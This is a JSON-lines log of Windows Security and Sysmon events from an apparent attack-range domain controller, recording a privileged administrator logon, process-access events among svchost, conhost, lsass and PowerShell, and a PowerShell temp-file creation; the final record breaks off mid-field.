{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220596,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x83183\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x83183","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5609,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.025\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.025","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5610,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.025\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.025","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5611,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.025\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.025","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5612,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.025\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.025","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5613,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.025\r\nSourceProcessGUID: {E2A3D6B1-11D4-5F25-0000-00100D0C0800}\r\nSourceProcessId: 796\r\nSourceThreadId: 2504\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D6-5F25-0000-00106A320800}\r\nTargetProcessId: 4848\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.025","SourceProcessGUID":"{E2A3D6B1-11D4-5F25-0000-00100D0C0800}","SourceProcessId":"796","SourceThreadId":"2504","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D6-5F25-0000-00106A320800}","TargetProcessId":"4848","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5614,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.041\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D6-5F25-0000-00106A320800}\r\nTargetProcessId: 4848\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.041","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11D6-5F25-0000-00106A320800}","TargetProcessId":"4848","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5615,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.057\r\nProcessGuid: {E2A3D6B1-11D6-5F25-0000-00106A320800}\r\nProcessId: 4848\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_rgzvmp5b.u02.ps1\r\nCreationUtcTime: 2020-08-01 06:55:18.057","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.057","ProcessGuid":"{E2A3D6B1-11D6-5F25-0000-00106A320800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_rgzvmp5b.u02.ps1","CreationUtcTime":"2020-08-01 06:55:18.057","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5616,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.088\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11D6-5F25-0000-00106A320800}\r\nTargetProcessId: 4848\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.088","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11D6-5F25-0000-00106A320800}","TargetProcessId":"4848","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5617,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.088\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11D6-5F25-0000-00106A320800}\r\nTargetProcessId: 4848\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: 